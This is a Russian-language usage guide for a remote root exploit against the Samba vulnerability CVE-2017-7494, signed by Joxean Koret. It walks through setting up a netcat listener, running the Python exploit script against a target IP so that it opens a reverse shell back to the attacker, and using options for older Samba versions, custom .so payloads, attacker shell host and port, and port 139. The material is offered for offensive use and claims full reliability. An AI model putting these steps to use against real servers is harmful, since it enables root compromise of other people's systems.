
Удалённый root-эксплойт для уязвимости SAMBA CVE-2017-7494
Удалённый root-эксплойт для уязвимости SAMBA CVE-2017-7494.
Этот эксплойт разделён на 2 части:
Пока цель уязвима, а полезная нагрузка соответствует операционной системе и архитектуре цели, эксплойт работает со 100% надёжностью.
На вашей машине выполните следующую команду:
$ nc -p 31337 -l
Затем запустите эксплойт против вашей цели и дождитесь, пока он подключится обратно к вашему Netcat:
$ python cve_2017_7494.py -t target_ip
Если вы закроете обратный шелл слишком быстро, вместо повторного запуска эксплойта с загрузкой модуля и т.д. вы можете просто передать путь к уже загруженному модулю. Предположим, он был загружен в /shared/directory/ как "module.so", тогда вы выполните команду следующего вида:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
Теперь вы можете запустить эксплойт против samba 3.5.0 и 3.6.0, для этого просто добавьте аргумент -o 1
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
Теперь вы можете использовать свой собственный .so
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
Если вам нужно запустить этот скрипт с x86-машины, компиляция бинарных файлов импланта создаст два x86-файла. Используя флаг -n 1, вы можете отключить компиляцию и скопировать libimplantx64.so с другой машины.
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
В случае, если samba работает только на порту 139. Вы можете задать порт удалённого сервера с помощью аргумента -p
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Я больше не поддерживаю его.
-- Joxean Koret